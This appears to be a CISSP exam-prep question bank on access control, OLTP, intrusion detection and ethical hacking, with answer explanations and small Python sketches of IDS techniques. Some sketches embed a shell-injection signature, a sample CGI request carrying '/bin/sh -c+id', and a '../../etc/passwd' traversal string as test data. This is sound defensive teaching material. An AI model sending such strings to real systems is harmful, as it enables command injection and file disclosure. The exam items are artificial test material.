Mandatory access controls
Assurance procedures
Administrative controls
Accountability controls provide accountability for individuals accessing information. Assurance procedures ensure that the access control mechanisms correctly implement the security policy for the entire life cycle of an information system.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 2: Access control systems (page 33).
Which of the following is needed for System Accountability?
Audit mechanisms.
Documented design as laid out in the Common Criteria.
Authorization.
Formal verification of system design.
Audit mechanisms are a means of being able to track user actions. Through the use of audit logs and other tools, user actions are recorded and can be used at a later date to verify what actions were performed.
Accountability is the ability to identify users and to be able to track user actions.
The following answers are incorrect:
Documented design as laid out in the Common Criteria. Is incorrect because the Common Criteria is an international standard to evaluate trust and would not be a factor in System Accountability.
Authorization. Is incorrect because Authorization is granting access to subjects, just because you have authorization does not hold the subject accountable for their actions.
Formal verification of system design. Is incorrect because all you have done is to verify the system design and have not taken any steps toward system accountability.
References:
OIG CBK Glossary (page 778)
Which of the following would be LEAST likely to prevent an employee from reporting an incident?
They are afraid of being pulled into something they don't want to be involved with.
The process of reporting incidents is centralized.
They are afraid of being accused of something they didn't do.
They are unaware of the company's security policies and procedures.
The reporting process should be centralized; otherwise, employees won't bother to report incidents. A centralized reporting process is therefore the least likely of these factors to prevent an employee from reporting an incident.
The other answers are incorrect because :
They are afraid of being pulled into something they don't want to be involved with is incorrect, as many employees fear this and it would prevent them from reporting an incident.
They are afraid of being accused of something they didn't do is also incorrect, as this also prevents them from reporting an incident.
They are unaware of the company's security policies and procedures is also incorrect, as mentioned above.
Reference: Shon Harris, AIO v3, Chapter 10: Laws, Investigation & Ethics, Page 675.
Which of the following tools is less likely to be used by a hacker?
l0phtcrack
Tripwire
OphCrack
John the Ripper
Tripwire is an integrity checking product, triggering alarms when important files (e.g. system or configuration files) are modified.
This is a tool that is not likely to be used by hackers, other than for studying its workings in order to circumvent it.
Other programs are password-cracking programs and are likely to be used by security administrators as well as by hackers. More info regarding Tripwire available on the Tripwire, Inc. Web Site.
NOTE:
The biggest competitor to the commercial version of Tripwire is the freeware version of Tripwire. You can get the Open Source version of Tripwire at the following URL: http://sourceforge.net/projects/tripwire/
In an online transaction processing system (OLTP), which of the following actions should be taken when erroneous or invalid transactions are detected?
The transactions should be dropped from processing.
The transactions should be processed after the program makes adjustments.
The transactions should be written to a report and reviewed.
The transactions should be corrected and reprocessed.
In an online transaction processing system (OLTP), all transactions are recorded as they occur. When erroneous or invalid transactions are detected, they should be written to a report and reviewed, and the transaction can be recovered by reviewing the logs.
As explained in the ISC2 OIG:
OLTP is designed to record all of the business transactions of an organization as they occur. It is a data processing system facilitating and managing transaction-oriented applications. These are characterized as a system used by many concurrent users who are actively adding and modifying data to effectively change real-time data.
OLTP environments are frequently found in the finance, telecommunications, insurance, retail, transportation, and travel industries. For example, airline ticket agents enter data in the database in real-time by creating and modifying travel reservations, and these are increasingly joined by users directly making their own reservations and purchasing tickets through airline company Web sites as well as discount travel Web site portals. Therefore, millions of people may be accessing the same flight database every day, and dozens of people may be looking at a specific flight at the same time.
The security concerns for OLTP systems are concurrency and atomicity.
Concurrency controls ensure that two users cannot simultaneously change the same data, or that one user cannot make changes before another user is finished with it. In an airline ticket system, it is critical for an agent processing a reservation to complete the transaction, especially if it is the last seat available on the plane.
Atomicity ensures that all of the steps involved in the transaction complete successfully. If one step should fail, then the other steps should not be able to complete. Again, in an airline ticketing system, if the agent does not enter a name into the name data field correctly, the transaction should not be able to complete.
OLTP systems should act as a monitoring system and detect when individual processes abort, automatically restart an aborted process, back out of a transaction if necessary, allow distribution of multiple copies of application servers across machines, and perform dynamic load balancing.
A security feature uses transaction logs to record information on a transaction before it is processed, and then marks it as processed after it is done. If the system fails during the transaction, the transaction can be recovered by reviewing the transaction logs.
Checkpoint restart is the process of using the transaction logs to restart the machine by running through the log to the last checkpoint or good transaction. All transactions following the last checkpoint are applied before allowing users to access the data again.
Wikipedia has nice coverage on what is OLTP:
Online transaction processing, or OLTP, refers to a class of systems that facilitate and manage transaction-oriented applications, typically for data entry and retrieval transaction processing. The term is somewhat ambiguous; some understand a "transaction" in the context of computer or database transactions, while others (such as the Transaction Processing Performance Council) define it in terms of business or commercial transactions.
OLTP has also been used to refer to processing in which the system responds immediately to user requests. An automatic teller machine (ATM) for a bank is an example of a commercial transaction processing application.
The technology is used in a number of industries, including banking, airlines, mailorder, supermarkets, and manufacturing. Applications include electronic banking, order processing, employee time clock systems, e-commerce, and eTrading.
There are two security concerns for OLTP systems: Concurrency and Atomicity
ATOMICITY
In database systems, atomicity (or atomicness) is one of the ACID transaction properties. In an atomic transaction, a series of database operations either all occur, or nothing occurs. A guarantee of atomicity prevents updates to the database occurring only partially, which can cause greater problems than rejecting the whole series outright.
The etymology of the phrase originates in the Classical Greek concept of a fundamental and indivisible component; see atom.
An example of atomicity is ordering an airline ticket where two actions are required: payment, and a seat reservation. The potential passenger must either:
both pay for and reserve a seat; OR
neither pay for nor reserve a seat.
The booking system does not consider it acceptable for a customer to pay for a ticket without securing the seat, nor to reserve the seat without payment succeeding.
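A small sketch of that all-or-nothing behaviour, using Python's built-in sqlite3 (table names and values are made up for the example):

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE payments (passenger TEXT, amount REAL)")
    conn.execute("CREATE TABLE seats (passenger TEXT, seat TEXT)")

    try:
        with conn:  # one transaction: committed only if every step succeeds
            conn.execute("INSERT INTO payments VALUES (?, ?)", ("Alice", 250.0))
            # ... the seat INSERT would go here; simulate its failure instead:
            raise RuntimeError("seat assignment failed")
    except RuntimeError:
        pass

    # The partial payment was rolled back along with the failed step: nothing was stored.
    assert conn.execute("SELECT COUNT(*) FROM payments").fetchone()[0] == 0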
CONCURRENCY
Database concurrency controls ensure that transactions occur in an ordered fashion.
The main job of these controls is to protect transactions issued by different users/applications from the effects of each other. They must preserve the four characteristics of the database transaction ACID test: Atomicity, Consistency, Isolation, and Durability. Read http://en.wikipedia.org/wiki/ACID for more details on the ACID test.
Thus concurrency control is an essential element for correctness in any system where two or more database transactions, executed with time overlap, can access the same data, e.g., virtually any general-purpose database system. A well-established concurrency control theory exists for database systems: serializability theory, which makes it possible to effectively design and analyze concurrency control methods and mechanisms.
Concurrency is not an issue in itself, it is the lack of proper concurrency controls that makes it a serious issue.
The following answers are incorrect:
The transactions should be dropped from processing. Is incorrect because the transactions are processed and when erroneous or invalid transactions are detected the transaction can be recovered by reviewing the logs.
The transactions should be processed after the program makes adjustments. Is incorrect because the transactions are processed and when erroneous or invalid transactions are detected the transaction can be recovered by reviewing the logs.
The transactions should be corrected and reprocessed. Is incorrect because the transactions are processed and when erroneous or invalid transactions are detected the transaction can be recovered by reviewing the logs.
References:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 12749-12768). Auerbach Publications. Kindle Edition.
and
http://en.wikipedia.org/wiki/Online_transaction_processing
and
http://databases.about.com/od/administration/g/concurrency.htm
The fact that a network-based IDS reviews packet payloads and headers enables which of the following?
Detection of denial of service
Detection of all viruses
Detection of data corruption
Detection of all password guessing attacks
Because a network-based IDS reviews packet payloads and headers, denial of service attacks can also be detected.
This question is an easy one if you go through the process of elimination. When you see an answer containing the keyword ALL, it is something of a giveaway that it is not the proper answer. On the real exam you may encounter a few questions where the use of the word ALL renders the choice invalid. Pay close attention to such keywords.
The following are incorrect answers:
Even though most IDSs can detect some viruses and some password guessing attacks, they cannot detect ALL viruses or ALL password guessing attacks. Therefore these two answers are only detractors.
Unless the IDS knows the valid values for a certain dataset, it can NOT detect data corruption.
Reference used for this question:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 48.
Which of the following is NOT a valid reason to use external penetration service firms rather than corporate resources?
They are more cost-effective
They offer a lack of corporate bias
They use highly talented ex-hackers
They ensure a more complete reporting
Two points are important to consider when it comes to ethical hacking: integrity and independence.
By not using an ethical hacking firm that hires or subcontracts to ex-hackers or others who have criminal records, an entire subset of risks can be avoided by an organization. Also, it is not cost-effective for a single firm to fund the effort of the ongoing research and development, systems development, and maintenance that is needed to operate state-of-the-art proprietary and open source testing tools and techniques.
External penetration firms are more effective than internal penetration testers because they are not influenced by any previous system security decisions, knowledge of the current system environment, or future system security plans. Moreover, an employee performing penetration testing might be reluctant to fully report security gaps.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Appendix F: The Case for Ethical Hacking (page 517).
What setup should an administrator use for regularly testing the strength of user passwords?
A networked workstation so that the live password database can easily be accessed by the cracking program.
A networked workstation so the password database can easily be copied locally and processed by the cracking program.
A standalone workstation on which the password database is copied and processed by the cracking program.
A password-cracking program is unethical; therefore it should not be used.
Poor password selection is frequently a major problem for any system's security. Administrators should obtain and use password-guessing programs frequently to identify those users having easily guessed passwords.
Because password-cracking programs are very CPU intensive and can slow the system on which they are running, it is a good idea to transfer the encrypted passwords to a standalone (not networked) workstation. Also, by doing the work on a non-networked machine, any results found will not be accessible by anyone unless they have physical access to that system.
Out of the four choices presented above, this is the best choice.
However, in real life you would have strong password policies that enforce complexity requirements and do not let the user choose a simple or short password that can be easily cracked or guessed. That would be the best choice if it were one of the choices presented.
Another issue with password cracking is one of privacy. Many password-cracking tools can address this by only showing that the password was cracked, not what the password actually is, masking the password from the person doing the cracking.
Source: National Security Agency, Systems and Network Attack Center (SNAC), The 60 Minute Network Security Guide, February 2002, page 8.
Which of the following reviews system and event logs to detect attacks on the host and determine if the attack was successful?
host-based IDS
firewall-based IDS
bastion-based IDS
server-based IDS
A host-based IDS can review the system and event logs in order to detect an attack on the host and to determine if the attack was successful.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 48.
Which conceptual approach to intrusion detection system is the most common?
Behavior-based intrusion detection
Knowledge-based intrusion detection
Statistical anomaly-based intrusion detection
Host-based intrusion detection
There are two conceptual approaches to intrusion detection. Knowledge-based intrusion detection uses a database of known vulnerabilities to look for current attempts to exploit them on a system and trigger an alarm if an attempt is found. The other approach, not as common, is called behaviour-based or statistical analysis-based. A host-based intrusion detection system is a common implementation of intrusion detection, not a conceptual approach.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 3: Telecommunications and Network Security (page 63).
Also: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 4: Access Control (pages 193-194).
Which of the following is NOT a characteristic of a host-based intrusion detection system?
A HIDS does not consume large amounts of system resources
A HIDS can analyse system logs, processes and resources
A HIDS looks for unauthorized changes to the system
A HIDS can notify system administrators when unusual events are identified
A HIDS does not consume large amounts of system resources is the correct choice. HIDS can consume inordinate amounts of CPU and system resources in order to function effectively, especially during an event.
All the other answers are characteristics of HIDSes.
A HIDS can:
scrutinize event logs, critical system files, and other auditable system resources;
look for unauthorized changes or suspicious patterns of behavior or activity;
send alerts when unusual events are discovered.
Which of the following monitors network traffic in real time?
network-based IDS
host-based IDS
application-based IDS
firewall-based IDS
This type of IDS is called a network-based IDS because it monitors network traffic in real time.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 48.
Why would anomaly detection IDSs often generate a large number of false positives?
Because they can only identify correctly attacks they already know about.
Because they are application-based and therefore more subject to attacks.
Because they can't identify abnormal behavior.
Because normal patterns of user and system behavior can vary wildly.
Unfortunately, anomaly detectors and the Intrusion Detection Systems (IDS) based on them often produce a large number of false alarms, as normal patterns of user and system behavior can vary wildly. Being only able to identify correctly attacks they already know about is a characteristic of misuse detection (signature-based) IDSs. Application-based IDSs are a special subset of host-based IDSs that analyze the events transpiring within a software application. They are more vulnerable to attacks than host-based IDSs. Not being able to identify abnormal behavior would not cause false positives, since they are not identified.
Source: DUPUIS, Clément, Access Control Systems and Methodology CISSP Open Study Guide, version 1.0, March 2002 (page 92).
If an organization were to monitor their employees' e-mail, it should not:
Monitor only a limited number of employees.
Inform all employees that e-mail is being monitored.
Explain who can read the e-mail and how long it is backed up.
Explain what is considered an acceptable use of the e-mail system.
Monitoring has to be conducted in a lawful manner and applied in a consistent fashion; thus it should be applied uniformly to all employees, not only to a small number.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 9: Law, Investigation, and Ethics (page 304).
Which of the following would assist the most in Host Based intrusion detection?
audit trails.
access control lists.
security clearances
host-based authentication
To assist in Intrusion Detection you would review audit logs for access violations.
The following answers are incorrect:
access control lists. This is incorrect because access control lists determine who has access to what but do not detect intrusions.
security clearances. This is incorrect because security clearances determine who has access to what but do not detect intrusions.
host-based authentication. This is incorrect because host-based authentication determines who has been authenticated to the system but does not detect intrusions.
Several analysis methods can be employed by an IDS, each with its own strengths and weaknesses, and their applicability to any given situation should be carefully considered. There are two basic IDS analysis methods that exist. Which of these basic methods is more prone to false positives?
Pattern Matching (also called signature analysis)
Anomaly Detection
Host-based intrusion detection
Network-based intrusion detection
Several analysis methods can be employed by an IDS, each with its own strengths and weaknesses, and their applicability to any given situation should be carefully considered.
There are two basic IDS analysis methods:
1. Pattern Matching (also called signature analysis), and
2. Anomaly detection
PATTERN MATCHING
Some of the first IDS products used signature analysis as their detection method and simply looked for known characteristics of an attack (such as specific packet sequences or text in the data stream) to produce an alert if that pattern was detected. If a new or different attack vector is used, it will not match a known signature and, thus, slip past the IDS.
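To make the mechanism concrete, the following is a minimal, hypothetical sketch of signature analysis (not taken from the referenced guide); the signature names, byte patterns, and sample payload are illustrative assumptions only.

```python
# Minimal signature-matching sketch (illustrative only).
# Signature names and byte patterns are made-up examples, not real attack content.
SIGNATURES = {
    "web-cmd-injection": b"/bin/sh -c",
    "nop-sled": b"\x90" * 16,
}

def match_signatures(payload: bytes) -> list[str]:
    """Return the names of all known signatures found in a packet payload."""
    return [name for name, pattern in SIGNATURES.items() if pattern in payload]

if __name__ == "__main__":
    sample_payload = b"GET /cgi-bin/test?cmd=/bin/sh -c+id HTTP/1.1"
    hits = match_signatures(sample_payload)
    if hits:
        print("ALERT: known attack pattern(s) detected:", hits)
    else:
        print("No known signature matched (a novel attack would slip past).")
```

A payload that contains none of the known patterns produces no alert, which is exactly the blind spot described above.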
ANOMALY DETECTION
Alternately, anomaly detection uses behavioral characteristics of a system’s operation or network traffic to draw conclusions on whether the traffic represents a risk to the network or host. Anomalies may include but are not limited to:
Multiple failed log-on attempts
Users logging in at strange hours
Unexplained changes to system clocks
Unusual error messages
Unexplained system shutdowns or restarts
Attempts to access restricted files
An anomaly-based IDS tends to produce more data because anything outside of the expected behavior is reported. Thus, they tend to report more false positives as expected behavior patterns change. An advantage to anomaly-based IDS is that, because they are based on behavior identification and not specific patterns of traffic, they are often able to detect new attacks that may be overlooked by a signature-based system. Often information from an anomaly-based IDS may be used to create a pattern for a signature-based IDS.
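As an illustration of the behavioral approach, here is a small sketch under assumed data: a per-user baseline of usual log-on hours and tolerated failed attempts, with anything outside it reported. The baseline values, event format, and thresholds are invented for demonstration and would normally be learned from historical data.

```python
# Illustrative anomaly-detection sketch: flag log-ons outside a learned baseline.
from dataclasses import dataclass

@dataclass
class LogonEvent:
    user: str
    hour: int             # hour of day, 0-23
    failed_attempts: int  # failed attempts preceding this log-on

# "Learned" normal behavior per user (hard-coded here purely for demonstration).
BASELINE = {
    "alice": {"usual_hours": range(8, 19), "max_failures": 3},
}

def is_anomalous(event: LogonEvent) -> bool:
    profile = BASELINE.get(event.user)
    if profile is None:
        return True  # unknown user: outside expected behavior
    return (event.hour not in profile["usual_hours"]
            or event.failed_attempts > profile["max_failures"])

print(is_anomalous(LogonEvent("alice", hour=3, failed_attempts=7)))   # True -> alert
print(is_anomalous(LogonEvent("alice", hour=10, failed_attempts=0)))  # False -> normal
```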
Host Based Intrusion Detection (HIDS)
HIDS is the implementation of IDS capabilities at the host level. Its most significant difference from NIDS is that related processes are limited to the boundaries of a single-host system. However, this presents advantages in effectively detecting objectionable activities because the IDS process is running directly on the host system, not just observing it from the network. This offers unfettered access to system logs, processes, system information, and device information, and virtually eliminates limits associated with encryption. The level of integration represented by HIDS increases the level of visibility and control at the disposal of the HIDS application.
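A toy host-based check might look like the sketch below, which scrutinizes an authentication log and verifies the hash of a critical system file. The file paths, log format, threshold, and baseline hash are assumptions, not a real HIDS implementation.

```python
# Host-based sketch: watch an auth log and verify a critical file's hash.
import hashlib
from pathlib import Path

AUTH_LOG = Path("/var/log/auth.log")   # assumed log location
CRITICAL_FILE = Path("/etc/passwd")    # example critical system file
KNOWN_GOOD_SHA256 = "0" * 64           # placeholder; record the real digest at baseline time

def failed_logins(log_path: Path) -> int:
    try:
        return sum("Failed password" in line
                   for line in log_path.read_text(errors="ignore").splitlines())
    except FileNotFoundError:
        return 0

def file_changed(path: Path, expected_sha256: str) -> bool:
    try:
        digest = hashlib.sha256(path.read_bytes()).hexdigest()
    except FileNotFoundError:
        return True  # a missing critical file is itself suspicious
    return digest != expected_sha256

if failed_logins(AUTH_LOG) > 5:
    print("ALERT: excessive failed log-on attempts on this host")
if file_changed(CRITICAL_FILE, KNOWN_GOOD_SHA256):
    print("ALERT: critical system file has been modified")
```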
Network Based Intrusion Detection (NIDS)
NIDS are usually incorporated into the network in a passive architecture, taking advantage of promiscuous mode access to the network. This means that it has visibility into every packet traversing the network segment. This allows the system to inspect packets and monitor sessions without impacting the network or the systems and applications utilizing the network.
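For illustration only, the sketch below opens a raw packet socket so the process sees every frame on the segment, which is the passive, promiscuous-style visibility described above. It assumes Linux and root privileges, and it only prints frame sizes; a real NIDS would decode and inspect each packet.

```python
# Passive capture sketch (Linux only, requires root): a raw AF_PACKET socket
# receives every frame on the interface, analogous to promiscuous-mode sensing.
import socket

ETH_P_ALL = 0x0003  # capture all protocols

def sniff(max_frames: int = 10) -> None:
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(ETH_P_ALL)) as s:
        for i in range(max_frames):
            frame, addr = s.recvfrom(65535)
            print(f"frame {i}: {len(frame)} bytes on interface {addr[0]}")

if __name__ == "__main__":
    sniff()
```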
Below you have other ways that intrusion detection can be performed:
Stateful Matching Intrusion Detection
Stateful matching takes pattern matching to the next level. It scans for attack signatures in the context of a stream of traffic or overall system behavior rather than the individual packets or discrete system activities. For example, an attacker may use a tool that sends a volley of valid packets to a targeted system. Because all the packets are valid, pattern matching is nearly useless. However, the fact that a large volume of the packets was seen may, itself, represent a known or potential attack pattern. To evade detection, then, the attacker may send the packets from multiple locations with long wait periods between each transmission to either confuse the signature detection system or exhaust its session timing window. If the IDS service is tuned to record and analyze traffic over a long period of time it may detect such an attack. Because stateful matching also uses signatures, it too must be updated regularly and, thus, has some of the same limitations as pattern matching.
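A rough sketch of the stateful idea, under assumed values for the window and threshold, is shown below: state is kept per source over a long window so that a "low and slow" probe pattern still accumulates into something detectable.

```python
# Stateful-matching sketch: track events per source over a long window so that
# slow probes still accumulate into a detectable pattern. Values are arbitrary.
import time
from collections import defaultdict, deque
from typing import Optional

WINDOW_SECONDS = 6 * 60 * 60   # keep six hours of state per source
THRESHOLD = 50                 # alert once a source exceeds this many probes

_events = defaultdict(deque)   # source IP -> timestamps of observed probes

def record_probe(source_ip: str, now: Optional[float] = None) -> bool:
    """Record one probe; return True if the source crosses the alert threshold."""
    now = time.time() if now is None else now
    window = _events[source_ip]
    window.append(now)
    while window and now - window[0] > WINDOW_SECONDS:
        window.popleft()       # expire state that fell out of the window
    return len(window) > THRESHOLD

# Simulate a slow scan: one probe every five minutes still trips the alert eventually.
start = 0.0
for i in range(60):
    if record_probe("203.0.113.9", now=start + i * 300):
        print(f"ALERT: slow scan pattern from 203.0.113.9 after {i + 1} probes")
        break
```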
Statistical Anomaly-Based Intrusion Detection
The statistical anomaly-based IDS analyzes event data by comparing it to typical, known, or predicted traffic profiles in an effort to find potential security breaches. It attempts to identify suspicious behavior by analyzing event data and identifying patterns of entries that deviate from a predicted norm. This type of detection method can be very effective and, at a very high level, begins to take on characteristics seen in IPS by establishing an expected baseline of behavior and acting on divergence from that baseline. However, there are some potential issues that may surface with a statistical IDS. Tuning the IDS can be challenging and, if not performed regularly, the system will be prone to false positives. Also, the definition of normal traffic can be open to interpretation and does not preclude an attacker from using normal activities to penetrate systems. Additionally, in a large, complex, dynamic corporate environment, it can be difficult, if not impossible, to clearly define “normal” traffic. The value of statistical analysis is that the system has the potential to detect previously unknown attacks. This is a huge departure from the limitation of matching previously known signatures. Therefore, when combined with signature matching technology, the statistical anomaly-based IDS can be very effective.
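As a simplified illustration (with invented baseline numbers), a statistical detector can be reduced to comparing an observed metric against the mean and standard deviation of a learned profile:

```python
# Statistical anomaly sketch: compare an observed metric against a learned
# baseline using a simple z-score. Baseline figures are illustrative only.
from statistics import mean, stdev

# "Learned" hourly outbound-byte counts from a quiet training period (assumed data).
baseline_samples = [12_000, 14_500, 13_200, 12_800, 15_000, 13_900, 14_100, 12_500]

mu = mean(baseline_samples)
sigma = stdev(baseline_samples)

def is_deviant(observed: float, z_threshold: float = 3.0) -> bool:
    """Flag the observation if it deviates more than z_threshold standard deviations."""
    return abs(observed - mu) > z_threshold * sigma

print(is_deviant(13_700))   # False: within the predicted norm
print(is_deviant(90_000))   # True: large deviation, worth investigating
```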
Protocol Anomaly-Based Intrusion Detection
A protocol anomaly-based IDS identifies any unacceptable deviation from expected behavior based on known network protocols. For example, if the IDS is monitoring an HTTP session and the traffic contains attributes that deviate from established HTTP session protocol standards, the IDS may view that as a malicious attempt to manipulate the protocol, penetrate a firewall, or exploit a vulnerability. The value of this method is directly related to the use of well-known or well-defined protocols within an environment. If an organization primarily uses well-known protocols (such as HTTP, FTP, or telnet) this can be an effective method of performing intrusion detection. In the face of custom or nonstandard protocols, however, the system will have more difficulty or be completely unable to determine the proper packet format. Interestingly, this type of method is prone to the same challenges faced by signature-based IDSs. For example, specific protocol analysis modules may have to be added or customized to deal with unique or new protocols or unusual use of standard protocols. Nevertheless, having an IDS that is intimately aware of valid protocol use can be very powerful when an organization employs standard implementations of common protocols.
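A deliberately simplified sketch of protocol anomaly checking against the well-known HTTP request-line grammar follows; the method list, length limit, and regular expression are illustrative assumptions rather than a complete protocol validator.

```python
# Protocol-anomaly sketch: validate an HTTP request line against the well-known
# grammar (method, request-target, version). Deliberately simplified.
import re

VALID_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE", "PATCH"}
REQUEST_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/(?P<ver>\d\.\d)$")

def http_request_line_anomalous(line: str) -> bool:
    m = REQUEST_LINE.match(line)
    if not m:
        return True                        # does not follow the protocol grammar
    if m.group("method") not in VALID_METHODS:
        return True                        # unknown or made-up method
    if len(m.group("target")) > 2048:
        return True                        # suspiciously long URI
    return False

print(http_request_line_anomalous("GET /index.html HTTP/1.1"))          # False
print(http_request_line_anomalous("GIMME ../../etc/passwd HTTP/9.9"))   # True
```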
Traffic Anomaly-Based Intrusion Detection
A traffic anomaly-based IDS identifies any unacceptable deviation from expected behavior based on actual traffic structure. When a session is established between systems, there is typically an expected pattern and behavior to the traffic transmitted in that session. That traffic can be compared to expected traffic conduct based on the understandings of traditional system interaction for that type of connection. Like the other types of anomaly-based IDS, traffic anomaly-based IDS relies on the ability to establish “normal” patterns of traffic and expected modes of behavior in systems, networks, and applications. In a highly dynamic environment it may be difficult, if not impossible, to clearly define these parameters.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 3664-3686). Auerbach Publications. Kindle Edition.
and
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 3711-3734). Auerbach Publications. Kindle Edition.
and
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 3694-3711). Auerbach Publications. Kindle Edition.
Which of the following statements pertaining to ethical hacking is incorrect?
An organization should use ethical hackers who do not sell auditing, hardware, software, firewall, hosting, and/or networking services.
Testing should be done remotely to simulate external threats.
Ethical hacking should not involve writing to or modifying the target systems negatively.
Ethical hackers never use tools that have the potential of affecting servers or services.
The incorrect statement is that ethical hackers never use tools that have the potential of affecting servers or services. In reality, many of the tools used for ethical hacking have the potential of exploiting vulnerabilities and causing disruption to IT systems. It is up to the individuals performing the tests to be familiar with the tools' use and to make sure that no such disruption happens, or is at least kept to a minimum.
The first step, before sending even one single packet to the target, is to have a signed agreement with clear rules of engagement and a signed contract. The signed contract explains the associated risks to the client, and the client must agree to them before you send one packet to the target range. This way the client understands that some of the tests could lead to an interruption of service or even crash a server. The client signs to acknowledge that he is aware of such risks and is willing to accept them.
The following are incorrect answers:
An organization should use ethical hackers who do not sell auditing, hardware, software, firewall, hosting, and/or networking services. An ethical hacking firm's independence can be questioned if it sells security solutions at the same time as doing testing for the same client. There has to be independence between the judge (the tester) and the accused (the client).
Testing should be done remotely to simulate external threats. Testing that simulates a cracker coming from the Internet is often one of the first tests performed, in order to validate perimeter security. By performing tests remotely, the ethical hacking firm emulates the hacker's approach more realistically.
Ethical hacking should not involve writing to or modifying the target systems negatively. Even though ethical hacking should not involve negligence in writing to or modifying the target systems or reducing their response time, comprehensive penetration testing has to be performed using the most complete tools available, just as a real cracker would.
Reference(s) used for this question:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Appendix F: The Case for Ethical Hacking (page 520).
Knowledge-based Intrusion Detection Systems (IDS) are more common than:
Network-based IDS
Host-based IDS
Behavior-based IDS
Application-Based IDS
Knowledge-based IDS are more common than behavior-based ID systems.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 63.
Application-Based IDS - "a subset of HIDS that analyze what's going on in an application using the transaction log files of the application." Source: Official ISC2 CISSP CBK Review Seminar Student Manual Version 7.0 p. 87
Host-Based IDS - "an implementation of IDS capabilities at the host level. Its most significant difference from NIDS is intrusion detection analysis, and related processes are limited to the boundaries of the host." Source: Official ISC2 Guide to the CISSP CBK - p. 197
Network-Based IDS - "a network device, or dedicated system attached to the network, that monitors traffic traversing the network segment for which it is integrated." Source: Official ISC2 Guide to the CISSP CBK - p. 196
CISSP For Dummies, a book that we recommend for a quick overview of the 10 domains, has nice and concise coverage of the subject:
Intrusion detection is defined as real-time monitoring and analysis of network activity and data for potential vulnerabilities and attacks in progress. One major limitation of current intrusion detection system (IDS) technologies is the requirement to filter false alarms lest the operator (system or security administrator) be overwhelmed with data. IDSes are classified in many different ways, including active and passive, network-based and host-based, and knowledge-based and behavior-based:
Active and passive IDS
An active IDS (now more commonly known as an intrusion prevention system — IPS) is a system that's configured to automatically block suspected attacks in progress without any intervention required by an operator. IPS has the advantage of providing real-time corrective action in response to an attack but has many disadvantages as well. An IPS must be placed in-line along a network boundary; thus, the IPS itself is susceptible to attack. Also, if false alarms and legitimate traffic haven't been properly identified and filtered, authorized users and applications may be improperly denied access. Finally, the IPS itself may be used to effect a Denial of Service (DoS) attack by intentionally flooding the system with alarms that cause it to block connections until no connections or bandwidth are available.
A passive IDS is a system that's configured only to monitor and analyze network traffic activity and alert an operator to potential vulnerabilities and attacks. It isn't capable of performing any protective or corrective functions on its own. The major advantages of passive IDSes are that these systems can be easily and rapidly deployed and are not normally susceptible to attack themselves.
Network-based and host-based IDS
A network-based IDS usually consists of a network appliance (or sensor) with a Network Interface Card (NIC) operating in promiscuous mode and a separate management interface. The IDS is placed along a network segment or boundary and monitors all traffic on that segment.
A host-based IDS requires small programs (or agents) to be installed on individual systems to be monitored. The agents monitor the operating system and write data to log files and/or trigger alarms. A host-based IDS can only monitor the individual host systems on which the agents are installed; it doesn't monitor the entire network.
Knowledge-based and behavior-based IDS
A knowledge-based (or signature-based) IDS references a database of previous attack profiles and known system vulnerabilities to identify active intrusion attempts. Knowledge-based IDS is currently more common than behavior-based IDS.
Advantages of knowledge-based systems include the following:
It has lower false alarm rates than behavior-based IDS.
Alarms are more standardized and more easily understood than behavior-based IDS.
Disadvantages of knowledge-based systems include these:
Signature database must be continually updated and maintained.
New, unique, or original attacks may not be detected or may be improperly classified.
A behavior-based (or statistical anomaly–based) IDS references a baseline or learned pattern of normal system activity to identify active intrusion attempts. Deviations from this baseline or pattern cause an alarm to be triggered.
Advantages of behavior-based systems include that they
Dynamically adapt to new, unique, or original attacks.
Are less dependent on identifying specific operating system vulnerabilities.
Disadvantages of behavior-based systems include
Higher false alarm rates than knowledge-based IDSes.
Usage patterns that may change often and may not be static enough to implement an effective behavior-based IDS.
Which of the following is not a preventive operational control?
Protecting laptops, personal computers and workstations.
Controlling software viruses.
Controlling data media access and disposal.
Conducting security awareness and technical training.
Conducting security awareness and technical training to ensure that end users and system users are aware of the rules of behaviour and their responsibilities in protecting the organization's mission is an example of a preventive management control, therefore not an operational control.
Source: STONEBURNER, Gary et al., NIST Special publication 800-30, Risk management Guide for Information Technology Systems, 2001 (page 37).
Which of the following is an IDS that acquires data and defines a "normal" usage profile for the network or host?
Statistical Anomaly-Based ID
Signature-Based ID
dynamical anomaly-based ID
inferential anomaly-based ID
